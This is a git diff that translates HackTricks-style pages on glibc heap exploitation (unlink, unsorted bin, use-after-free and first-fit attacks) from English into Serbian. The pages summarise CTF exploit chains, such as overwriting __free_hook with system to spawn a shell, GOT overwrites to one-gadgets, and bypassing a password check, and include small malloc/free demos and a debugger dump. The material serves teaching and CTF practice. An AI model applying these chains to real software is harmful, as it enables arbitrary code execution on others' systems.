+- U skladu sa CTF primerima, ovaj pokazivač se nalazi u nizu pokazivača na druge alokacije, stoga, čineći ga da pokazuje 3 adrese pre i imajući mogućnost da ga pročita i piše, moguće je učiniti da drugi pokazivači pokazuju na druge adrese.\
+Pošto korisnik potencijalno može da čita/piše i druge alokacije, može otkriti informacije ili prepisati nove adrese na proizvoljnim lokacijama (kao u GOT-u).
 
-### Requirements
+### Zahtevi
 
-- Some control in a memory (e.g. stack) to create a couple of chunks giving values to some of the attributes.
-- Stack leak in order to set the pointers of the fake chunk.
+- Neka kontrola u memoriji (npr. stek) da se kreira nekoliko delova dodeljujući vrednosti nekim od atributa.
+- Otkriće steka kako bi se postavili pokazivači lažnog dela.
 
-### Attack
+### Napad
 
-- There are a couple of chunks (chunk1 and chunk2)
-- The attacker controls the content of chunk1 and the headers of chunk2.
-- In chunk1 the attacker creates the structure of a fake chunk:
-  - To bypass protections he makes sure that the field `size` is correct to avoid the error: `corrupted size vs. prev_size while consolidating`
-  - and fields `fd` and `bk` of the fake chunk are pointing to where chunk1 pointer is stored in the with offsets of -3 and -2 respectively so `fake_chunk->fd->bk` and `fake_chunk->bk->fd` points to position in memory (stack) where the real chunk1 address is located:
+- Postoji nekoliko delova (chunk1 i chunk2)
+- Napadač kontroliše sadržaj chunk1 i zaglavlja chunk2.
+- U chunk1 napadač kreira strukturu lažnog dela:
+- Da bi zaobišao zaštite, osigurava da je polje `size` ispravno kako bi izbegao grešku: `corrupted size vs. prev_size while consolidating`
+- i polja `fd` i `bk` lažnog dela pokazuju na mesto gde je pokazivač chunk1 smešten sa offsetima -3 i -2, respektivno, tako da `fake_chunk->fd->bk` i `fake_chunk->bk->fd` pokazuju na poziciju u memoriji (stek) gde se nalazi prava adresa chunk1:
 
 
https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit

 
-- The headers of the chunk2 are modified to indicate that the previous chunk is not used and that the size is the size of the fake chunk contained.
-- When the second chunk is freed then this fake chunk is unlinked happening:
-  - `fake_chunk->fd->bk` = `fake_chunk->bk`
-  - `fake_chunk->bk->fd` = `fake_chunk->fd`
-- Previously it was made that `fake_chunk->fd->bk` and `fake_chunk->bk->fd` point to the same place (the location in the stack where `chunk1` was stored, so it was a valid linked list). As **both are pointing to the same location** only the last one (`fake_chunk->bk->fd = fake_chunk->fd`) will take **effect**.
-- This will **overwrite the pointer to chunk1 in the stack to the address (or bytes) stored 3 addresses before in the stack**.
-  - Therefore, if an attacker could control the content of the chunk1 again, he will be able to **write inside the stack** being able to potentially overwrite the return address skipping the canary and modify the values and points of local variables. Even modifying again the address of chunk1 stored in the stack to a different location where if the attacker could control again the content of chunk1 he will be able to write anywhere.
-  - Note that this was possible because the **addresses are stored in the stack**. The risk and exploitation might depend on **where are the addresses to the fake chunk being stored**.
+- Zaglavlja chunk2 su modifikovana da označe da prethodni deo nije korišćen i da je veličina veličina sadržanog lažnog dela.
+- Kada se drugi deo oslobodi, tada se ovaj lažni deo unlink-uje, dešavajući se:
+- `fake_chunk->fd->bk` = `fake_chunk->bk`
+- `fake_chunk->bk->fd` = `fake_chunk->fd`
+- Prethodno je napravljeno da `fake_chunk->fd->bk` i `fake_chunk->bk->fd` pokazuju na isto mesto (lokaciju u steku gde je `chunk1` bio smešten, tako da je to bila validna povezana lista). Pošto **oba pokazuju na istu lokaciju**, samo će poslednji (`fake_chunk->bk->fd = fake_chunk->fd`) imati **efekat**.
+- Ovo će **prepisati pokazivač na chunk1 u steku na adresu (ili bajtove) smeštene 3 adrese pre u steku**.
+- Stoga, ako bi napadač mogao ponovo da kontroliše sadržaj chunk1, moći će da **piše unutar steka**, potencijalno prepisujući adresu povratka preskočivši kanarija i menjajući vrednosti i pokazivače lokalnih promenljivih. Čak i ponovo menjajući adresu chunk1 smeštenu u steku na drugu lokaciju gde, ako bi napadač ponovo mogao da kontroliše sadržaj chunk1, mogao bi da piše bilo gde.
+- Imajte na umu da je ovo bilo moguće jer su **adrese smeštene u steku**. Rizik i eksploatacija mogu zavisiti od **gde su adrese lažnog dela smeštene**.
 
 
https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit

 
-## References
+## Reference
 
 - [https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit](https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit)
-- Although it would be weird to find an unlink attack even in a CTF here you have some writeups where this attack was used:
-  - CTF example: [https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html)
-    - In this example, instead of the stack there is an array of malloc'ed addresses. The unlink attack is performed to be able to allocate a chunk here, therefore being able to control the pointers of the array of malloc'ed addresses. Then, there is another functionality that allows to modify the content of chunks in these addresses, which allows to point addresses to the GOT, modify function addresses to egt leaks and RCE.
-  - Another CTF example: [https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html)
-    - Just like in the previous example, there is an array of addresses of allocations. It's possible to perform an unlink attack to make the address to the first allocation point a few possitions before starting the array and the overwrite this allocation in the new position. Therefore, it's possible to overwrite pointers of other allocations to point to GOT of atoi, print it to get a libc leak, and then overwrite atoi GOT with the address to a one gadget.
-  - CTF example with custom malloc and free functions that abuse a vuln very similar to the unlink attack: [https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html)
-    - There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute.
+- Iako bi bilo čudno pronaći unlink napad čak i u CTF-u, ovde imate nekoliko pisanih izveštaja gde je ovaj napad korišćen:
+- CTF primer: [https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html](https://guyinatuxedo.github.io/30-unlink/hitcon14_stkof/index.html)
+- U ovom primeru, umesto steka, postoji niz malloc'ovanih adresa. Unlink napad se vrši kako bi se ovde alocirao deo, stoga se može kontrolisati pokazivače niza malloc'ovanih adresa. Zatim, postoji još jedna funkcionalnost koja omogućava modifikaciju sadržaja delova u ovim adresama, što omogućava da se adrese usmere na GOT, modifikuju adrese funkcija za dobijanje leak-ova i RCE.
+- Još jedan CTF primer: [https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html](https://guyinatuxedo.github.io/30-unlink/zctf16_note2/index.html)
+- Baš kao u prethodnom primeru, postoji niz adresa alokacija. Moguće je izvršiti unlink napad kako bi se adresa prve alokacije usmerila nekoliko pozicija pre početka niza i prepisala ovu alokaciju na novoj poziciji. Stoga, moguće je prepisati pokazivače drugih alokacija da pokazuju na GOT funkcije atoi, ispisati je da bi se dobio libc leak, a zatim prepisati atoi GOT sa adresom jednog gadgeta.
+- CTF primer sa prilagođenim malloc i free funkcijama koje zloupotrebljavaju ranjivost vrlo sličnu unlink napadu: [https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw17_minesweeper/index.html)
+- Postoji overflow koji omogućava kontrolu FD i BK pokazivača prilagođenog malloc-a koji će biti (prilagođeni) oslobođeni. Štaviše, heap ima exec bit, tako da je moguće otkriti adresu heap-a i usmeriti funkciju iz GOT-a na heap deo sa shellcode-om za izvršavanje.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md
index 65d509c48..7d1775b79 100644
--- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md
@@ -4,70 +4,70 @@
 
 ## Basic Information
 
-For more information about what is an unsorted bin check this page:
+Za više informacija o tome šta je unsorted bin, pogledajte ovu stranicu:
 
 {{#ref}}
 bins-and-memory-allocations.md
 {{#endref}}
 
-Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a Glibc addresses or bypass some defense.
+Unsorted liste mogu da upisuju adresu u `unsorted_chunks (av)` u `bk` adresu chunk-a. Stoga, ako napadač može da **modifikuje adresu `bk` pokazivača** u chunk-u unutar unsorted bin-a, mogao bi da **upisuje tu adresu u proizvoljnu adresu** što bi moglo biti korisno za otkrivanje Glibc adresa ili zaobići neku od odbrana.
 
-So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A typical target is **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin atack to a fast bin attack).
+Dakle, u suštini, ovaj napad omogućava da se **postavi velika brojka na proizvoljnu adresu**. Ova velika brojka je adresa, koja može biti adresa heap-a ili Glibc adresa. Tipičan cilj je **`global_max_fast`** kako bi se omogućilo kreiranje fast bin bin-ova sa većim veličinama (i prelazak iz unsorted bin napada u fast bin napad).
 
 > [!TIP]
-> T> aking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.
+> P>ogledajte primer dat u [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) i koristeći 0x4000 i 0x5000 umesto 0x400 i 0x500 kao veličine chunk-ova (da bi se izbegao Tcache) moguće je videti da **danas** greška **`malloc(): unsorted double linked list corrupted`** se aktivira.
 >
-> Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bk->fd == victim` or not `victim->fd == av (arena)`, which means that the address where we want to write must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena.
+> Stoga, ovaj unsorted bin napad sada (pored drugih provera) takođe zahteva da se može popraviti dvostruko povezani spisak tako da se zaobiđe `victim->bk->fd == victim` ili ne `victim->fd == av (arena)`, što znači da adresa na koju želimo da pišemo mora imati adresu lažnog chunk-a u svom `fd` položaju i da lažni chunk `fd` pokazuje na arenu.
 
 > [!CAUTION]
-> Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **allocate the same size or the program will crash.**
+> Imajte na umu da ovaj napad korumpira unsorted bin (takođe mali i veliki). Dakle, možemo samo **koristiti alokacije iz fast bin-a sada** (kompleksniji program može raditi druge alokacije i srušiti se), a da bismo to aktivirali, moramo **alokirati istu veličinu ili će se program srušiti.**
 >
-> Note that overwriting **`global_max_fast`** might help in this case trusting that the fast bin will be able to take care of all the other allocations until the exploit is completed.
+> Imajte na umu da prepisivanje **`global_max_fast`** može pomoći u ovom slučaju verujući da će fast bin moći da se brine o svim ostalim alokacijama dok se eksploatacija ne završi.
 
-The code from [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) explains it very well, although if you modify the mallocs to allocate memory big enough so don't end in a Tcache you can see that the previously mentioned error appears preventing this technique: **`malloc(): unsorted double linked list corrupted`**
+Kod od [**guyinatuxedo**](https://guyinatuxedo.github.io/31-unsortedbin_attack/unsorted_explanation/index.html) to vrlo dobro objašnjava, iako ako modifikujete malloc-ove da alocirate dovoljno veliku memoriju da ne završite u Tcache-u, možete videti da se prethodno pomenuta greška pojavljuje sprečavajući ovu tehniku: **`malloc(): unsorted double linked list corrupted`**
 
 ## Unsorted Bin Infoleak Attack
 
-This is actually a very basic concept. The chunks in the unsorted bin are going to have pointers. The first chunk in the unsorted bin will actually have the **`fd`** and the **`bk`** links **pointing to a part of the main arena (Glibc)**.\
-Therefore, if you can **put a chunk inside a unsorted bin and read it** (use after free) or **allocate it again without overwriting at least 1 of the pointers** to then **read** it, you can have a **Glibc info leak**.
+Ovo je zapravo vrlo osnovni koncept. Chunk-ovi u unsorted bin-u će imati pokazivače. Prvi chunk u unsorted bin-u će zapravo imati **`fd`** i **`bk`** linkove **koji pokazuju na deo glavne arene (Glibc)**.\
+Stoga, ako možete **staviti chunk unutar unsorted bin-a i pročitati ga** (use after free) ili **ponovo ga alocirati bez prepisivanja barem 1 od pokazivača** da biste zatim **pročitali** ga, možete imati **Glibc info leak**.
 
-A similar [**attack used in this writeup**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), was to abuse a 4 chunks structure (A, B, C and D - D is only to prevent consolidation with top chunk) so a null byte overflow in B was used to make C indicate that B was unused. Also, in B the `prev_size` data was modified so the size instead of being the size of B was A+B.\
-Then C was deallocated, and consolidated with A+B (but B was still in used). A new chunk of size A was allocated and then the libc leaked addresses was written into B from where they were leaked.
+Sličan [**napad korišćen u ovom izveštaju**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw18_alienVSsamurai/index.html), bio je zloupotreba strukture od 4 chunk-a (A, B, C i D - D je samo da spreči konsolidaciju sa top chunk-om) tako da je korišćen null byte overflow u B da bi C ukazivao da je B neiskorišćen. Takođe, u B su podaci `prev_size` modifikovani tako da je veličina umesto veličine B bila A+B.\
+Zatim je C dealokiran, i konsolidovan sa A+B (ali B je još uvek bio u upotrebi). Novi chunk veličine A je alociran i zatim su adrese libc otkrivene upisane u B odakle su otkrivene.
 
 ## References & Other examples
 
 - [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#hitcon-training-lab14-magic-heap)
-  - The goal is to overwrite a global variable with a value greater than 4869 so it's possible to get the flag and PIE is not enabled.
-  - It's possible to generate chunks of arbitrary sizes and there is a heap overflow with the desired size.
-  - The attack starts creating 3 chunks: chunk0 to abuse the overflow, chunk1 to be overflowed and chunk2 so top chunk doesn't consolidate the previous ones.
-  - Then, chunk1 is freed and chunk0 is overflowed to the `bk` pointer of chunk1 points to: `bk = magic - 0x10`
-  - Then, chunk3 is allocated with the same size as chunk1, which will trigger the unsorted bin attack and will modify the value of the global variable, making possible to get the flag.
+- Cilj je prepisati globalnu promenljivu sa vrednošću većom od 4869 kako bi bilo moguće dobiti zastavicu i PIE nije omogućen.
+- Moguće je generisati chunk-ove proizvoljnih veličina i postoji heap overflow sa željenom veličinom.
+- Napad počinje kreiranjem 3 chunk-a: chunk0 za zloupotrebu overflow-a, chunk1 da bude overflow-ovan i chunk2 da top chunk ne konsoliduje prethodne.
+- Zatim, chunk1 se oslobađa i chunk0 se overflow-uje tako da `bk` pokazivač chunk-a1 pokazuje na: `bk = magic - 0x10`
+- Zatim, chunk3 se alocira sa istom veličinom kao chunk1, što će aktivirati unsorted bin napad i modifikovati vrednost globalne promenljive, omogućavajući dobijanje zastavice.
 - [**https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html**](https://guyinatuxedo.github.io/31-unsortedbin_attack/0ctf16_zerostorage/index.html)
-  - The merge function is vulnerable because if both indexes passed are the same one it'll realloc on it and then free it but returning a pointer to that freed region that can be used.
-  - Therefore, **2 chunks are created**: **chunk0** which will be merged with itself and chunk1 to prevent consolidating with the top chunk. Then, the **merge function is called with chunk0** twice which will cause a use after free.
-  - Then, the **`view`** function is called with index 2 (which the index of the use after free chunk), which will **leak a libc address**.
-  - As the binary has protections to only malloc sizes bigger than **`global_max_fast`** so no fastbin is used, an unsorted bin attack is going to be used to overwrite the global variable `global_max_fast`.
-  - Then, it's possible to call the edit function with the index 2 (the use after free pointer) and overwrite the `bk` pointer to point to `p64(global_max_fast-0x10)`. Then, creating a new chunk will use the previously compromised free address (0x20) will **trigger the unsorted bin attack** overwriting the `global_max_fast` which a very big value, allowing now to create chunks in fast bins.
-  - Now a **fast bin attack** is performed:
-    - First of all it's discovered that it's possible to work with fast **chunks of size 200** in the **`__free_hook`** location:
-    - 
gef➤  p &__free_hook
-      $1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
-      gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
-      0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
-      0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
-      0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
-      0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
-      

-      - If we manage to get a fast chunk of size 0x200 in this location, it'll be possible to overwrite a function pointer that will be executed
-    - For this, a new chunk of size `0xfc` is created and the merged function is called with that pointer twice, this way we obtain a pointer to a freed chunk of size `0xfc*2 = 0x1f8` in the fast bin.
-    - Then, the edit function is called in this chunk to modify the **`fd`** address of this fast bin to point to the previous **`__free_hook`** function.
-    - Then, a chunk with size `0x1f8` is created to retrieve from the fast bin the previous useless chunk so another chunk of size `0x1f8` is created to get a fast bin chunk in the **`__free_hook`** which is overwritten with the address of **`system`** function.
-    - And finally a chunk containing the string `/bin/sh\x00` is freed calling the delete function, triggering the **`__free_hook`** function which points to system with `/bin/sh\x00` as parameter.
-  - **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html)
-    - Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
+- Funkcija merge je ranjiva jer ako su oba prosleđena indeksa ista, ona će reallocirati na nju i zatim je osloboditi, ali vraćajući pokazivač na tu oslobođenu oblast koja se može koristiti.
+- Stoga, **2 chunk-a su kreirana**: **chunk0** koji će se spojiti sa samim sobom i chunk1 da spreči konsolidaciju sa top chunk-om. Zatim, **merge funkcija se poziva sa chunk0** dva puta što će izazvati use after free.
+- Zatim, **`view`** funkcija se poziva sa indeksom 2 (što je indeks chunk-a koji je use after free), što će **otkriti libc adresu**.
+- Kako binarni fajl ima zaštite da samo malloc veličine veće od **`global_max_fast`** se koriste, koristiće se unsorted bin napad da prepiše globalnu promenljivu `global_max_fast`.
+- Zatim, moguće je pozvati edit funkciju sa indeksom 2 (pokazivač use after free) i prepisati `bk` pokazivač da pokazuje na `p64(global_max_fast-0x10)`. Zatim, kreiranje novog chunk-a koristi prethodno kompromitovanu oslobođenu adresu (0x20) će **aktivirati unsorted bin napad** prepisujući `global_max_fast` sa veoma velikom vrednošću, omogućavajući sada kreiranje chunk-ova u fast bin-ovima.
+- Sada se izvodi **fast bin napad**:
+- Prvo je otkriveno da je moguće raditi sa fast **chunk-ovima veličine 200** na lokaciji **`__free_hook`**:
+- 
gef➤  p &__free_hook
+$1 = (void (**)(void *, const void *)) 0x7ff1e9e607a8 <__free_hook>
+gef➤  x/60gx 0x7ff1e9e607a8 - 0x59
+0x7ff1e9e6074f: 0x0000000000000000      0x0000000000000200
+0x7ff1e9e6075f: 0x0000000000000000      0x0000000000000000
+0x7ff1e9e6076f <list_all_lock+15>:      0x0000000000000000      0x0000000000000000
+0x7ff1e9e6077f <_IO_stdfile_2_lock+15>: 0x0000000000000000      0x0000000000000000
+

+- Ako uspemo da dobijemo fast chunk veličine 0x200 na ovoj lokaciji, biće moguće prepisati pokazivač funkcije koja će biti izvršena
+- Za to, kreira se novi chunk veličine `0xfc` i merge funkcija se poziva sa tim pokazivačem dva puta, na ovaj način dobijamo pokazivač na oslobođeni chunk veličine `0xfc*2 = 0x1f8` u fast bin-u.
+- Zatim, edit funkcija se poziva na ovom chunk-u da modifikuje **`fd`** adresu ovog fast bin-a da pokazuje na prethodnu **`__free_hook`** funkciju.
+- Zatim, kreira se chunk veličine `0x1f8` da se povuče iz fast bin-a prethodni beskorisni chunk tako da se kreira još jedan chunk veličine `0x1f8` da se dobije fast bin chunk u **`__free_hook`** koji se prepisuje sa adresom funkcije **`system`**.
+- I konačno, chunk koji sadrži string `/bin/sh\x00` se oslobađa pozivajući delete funkciju, aktivirajući **`__free_hook`** funkciju koja pokazuje na system sa `/bin/sh\x00` kao parametrom.
+- **CTF** [**https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html**](https://guyinatuxedo.github.io/33-custom_misc_heap/csaw19_traveller/index.html)
+- Još jedan primer zloupotrebe 1B overflow-a za konsolidaciju chunk-ova u unsorted bin-u i dobijanje libc infoleak-a, a zatim izvođenje fast bin napada za prepisivanje malloc hook-a sa adresom jednog gadget-a.
 - [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
-  - We can only allocate chunks of size greater than `0x100`.
-  - Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
-  - Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
+- Možemo samo alocirati chunk-ove veličine veće od `0x100`.
+- Prepisivanje `global_max_fast` koristeći Unsorted Bin napad (radi 1/16 puta zbog ASLR, jer moramo modifikovati 12 bita, ali moramo modifikovati 16 bita).
+- Fast Bin napad za modifikaciju globalnog niza chunk-ova. Ovo daje proizvoljnu read/write primitivu, koja omogućava modifikaciju GOT-a i postavljanje neke funkcije da pokazuje na `system`.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md
index d6fd34f42..044cfe6eb 100644
--- a/src/binary-exploitation/libc-heap/use-after-free/README.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/README.md
@@ -2,16 +2,16 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Osnovne informacije
 
-As the name implies, this vulnerability occurs when a program **stores some space** in the heap for an object, **writes** some info there, **frees** it apparently because it's not needed anymore and then **accesses it again**.
+Kao što ime implicira, ova ranjivost se javlja kada program **čuva neki prostor** u heap-u za objekat, **upisuje** neke informacije tamo, **oslobađa** ga očigledno jer više nije potreban i zatim **ponovo pristupa** njemu.
 
-The problem here is that it's not ilegal (there **won't be errors**) when a **freed memory is accessed**. So, if the program (or the attacker) managed to **allocate the freed memory and store arbitrary data**, when the freed memory is accessed from the initial pointer that **data would be have been overwritten** causing a **vulnerability that will depends on the sensitivity of the data** that was stored original (if it was a pointer of a function that was going to be be called, an attacker could know control it).
+Problem ovde je što nije ilegalno (neće biti grešaka) kada se **pristupi oslobođenoj memoriji**. Dakle, ako je program (ili napadač) uspeo da **alokira oslobođenu memoriju i sačuva proizvoljne podatke**, kada se oslobođena memorija pristupi iz inicijalnog pokazivača, **ti podaci bi bili prepisani**, uzrokujući **ranjivost koja će zavisiti od osetljivosti podataka** koji su prvobitno sačuvani (ako je to bio pokazivač funkcije koja će biti pozvana, napadač bi mogao da je kontroliše).
 
-### First Fit attack
+### Prvi Fit napad
 
-A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\
-Check more info in:
+Prvi fit napad cilja način na koji neki alokatori memorije, poput glibc-a, upravljaju oslobođenom memorijom. Kada oslobodite blok memorije, on se dodaje na listu, a novi zahtevi za memorijom uzimaju iz te liste sa kraja. Napadači mogu iskoristiti ovo ponašanje da manipulišu **koji se blokovi memorije ponovo koriste, potencijalno stičući kontrolu nad njima**. To može dovesti do problema "use-after-free", gde bi napadač mogao **promeniti sadržaj memorije koja se ponovo alocira**, stvarajući bezbednosni rizik.\
+Proverite više informacija u:
 
 {{#ref}}
 first-fit.md
diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
index 7bab07aea..7d39c526e 100644
--- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
@@ -4,36 +4,33 @@
 
 ## **First Fit**
 
-When you free memory in a program using glibc, different "bins" are used to manage the memory chunks. Here's a simplified explanation of two common scenarios: unsorted bins and fastbins.
+Kada oslobodite memoriju u programu koristeći glibc, različiti "bineri" se koriste za upravljanje delovima memorije. Evo pojednostavljenog objašnjenja dva uobičajena scenarija: neusortirani bineri i brzi bineri.
 
-### Unsorted Bins
+### Neusortirani Bineri
 
-When you free a memory chunk that's not a fast chunk, it goes to the unsorted bin. This bin acts like a list where new freed chunks are added to the front (the "head"). When you request a new chunk of memory, the allocator looks at the unsorted bin from the back (the "tail") to find a chunk that's big enough. If a chunk from the unsorted bin is bigger than what you need, it gets split, with the front part being returned and the remaining part staying in the bin.
+Kada oslobodite deo memorije koji nije brzi deo, on ide u neusortirani bin. Ovaj bin deluje kao lista gde se novi oslobođeni delovi dodaju na početak (glavu). Kada zatražite novi deo memorije, alokator gleda neusortirani bin od pozadi (rep) da pronađe deo koji je dovoljno velik. Ako je deo iz neusortiranog bina veći od onoga što vam treba, on se deli, pri čemu se prednji deo vraća, a preostali deo ostaje u binu.
 
-Example:
-
-- You allocate 300 bytes (`a`), then 250 bytes (`b`), the free `a` and request again 250 bytes (`c`).
-- When you free `a`, it goes to the unsorted bin.
-- If you then request 250 bytes again, the allocator finds `a` at the tail and splits it, returning the part that fits your request and keeping the rest in the bin.
-  - `c` will be pointing to the previous `a` and filled with the `a's`.
+Primer:
 
+- Alocirate 300 bajtova (`a`), zatim 250 bajtova (`b`), oslobodite `a` i ponovo zatražite 250 bajtova (`c`).
+- Kada oslobodite `a`, on ide u neusortirani bin.
+- Ako zatim ponovo zatražite 250 bajtova, alokator pronalazi `a` na repu i deli ga, vraćajući deo koji odgovara vašem zahtevu i zadržavajući ostatak u binu.
+- `c` će pokazivati na prethodni `a` i biti ispunjen sa `a's`.
 ```c
 char *a = malloc(300);
 char *b = malloc(250);
 free(a);
 char *c = malloc(250);
 ```
-
 ### Fastbins
 
-Fastbins are used for small memory chunks. Unlike unsorted bins, fastbins add new chunks to the head, creating a last-in-first-out (LIFO) behavior. If you request a small chunk of memory, the allocator will pull from the fastbin's head.
+Fastbins se koriste za male delove memorije. Za razliku od nesortiranih binova, fastbins dodaju nove delove na početak, stvarajući ponašanje poslednji ulaz, prvi izlaz (LIFO). Ako zatražite mali deo memorije, alokator će uzeti iz vrha fastbina.
 
-Example:
-
-- You allocate four chunks of 20 bytes each (`a`, `b`, `c`, `d`).
-- When you free them in any order, the freed chunks are added to the fastbin's head.
-- If you then request a 20-byte chunk, the allocator will return the most recently freed chunk from the head of the fastbin.
+Primer:
 
+- Alocirate četiri dela od po 20 bajtova (`a`, `b`, `c`, `d`).
+- Kada ih oslobodite u bilo kom redosledu, oslobođeni delovi se dodaju na vrh fastbina.
+- Ako zatim zatražite deo od 20 bajtova, alokator će vratiti najnovije oslobođeni deo iz vrha fastbina.
 ```c
 char *a = malloc(20);
 char *b = malloc(20);
@@ -48,17 +45,16 @@ b = malloc(20);   // c
 c = malloc(20);   // b
 d = malloc(20);   // a
 ```
-
-## Other References & Examples
+## Ostale reference i primeri
 
 - [**https://heap-exploitation.dhavalkapil.com/attacks/first_fit**](https://heap-exploitation.dhavalkapil.com/attacks/first_fit)
 - [**https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/**](https://8ksec.io/arm64-reversing-and-exploitation-part-2-use-after-free/)
-  - ARM64. Use after free: Generate an user object, free it, generate an object that gets the freed chunk and allow to write to it, **overwriting the position of user->password** from the previous one. Reuse the user to **bypass the password check**
+- ARM64. Use after free: Generišite korisnički objekat, oslobodite ga, generišite objekat koji dobija oslobođeni deo i omogućite pisanje u njega, **prepisujući poziciju user->password** iz prethodnog. Ponovo upotrebite korisnika da **obiđete proveru lozinke**
 - [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/use_after_free/#example**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/use_after_free/#example)
-  - The program allows to create notes. A note will have the note info in a malloc(8) (with a pointer to a function that could be called) and a pointer to another malloc(\) with the contents of the note.
-  - The attack would be to create 2 notes (note0 and note1) with bigger malloc contents than the note info size and then free them so they get into the fast bin (or tcache).
-    - Then, create another note (note2) with content size 8. The content is going to be in note1 as the chunk is going to be reused, were we could modify the function pointer to point to the win function and then Use-After-Free the note1 to call the new function pointer.
+- Program omogućava kreiranje beleški. Beleška će imati informacije o belešci u malloc(8) (sa pokazivačem na funkciju koja može biti pozvana) i pokazivač na drugi malloc(\) sa sadržajem beleške.
+- Napad bi bio da se kreiraju 2 beleške (note0 i note1) sa većim malloc sadržajem nego što je veličina informacija o belešci, a zatim ih osloboditi kako bi ušle u brzi bin (ili tcache).
+- Zatim, kreirajte još jednu belešku (note2) sa veličinom sadržaja 8. Sadržaj će biti u note1 jer će se deo ponovo koristiti, gde bismo mogli da modifikujemo pokazivač funkcije da pokazuje na win funkciju i zatim Use-After-Free note1 da pozovemo novi pokazivač funkcije.
 - [**https://guyinatuxedo.github.io/26-heap_grooming/pico_areyouroot/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/pico_areyouroot/index.html)
-  - It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag.
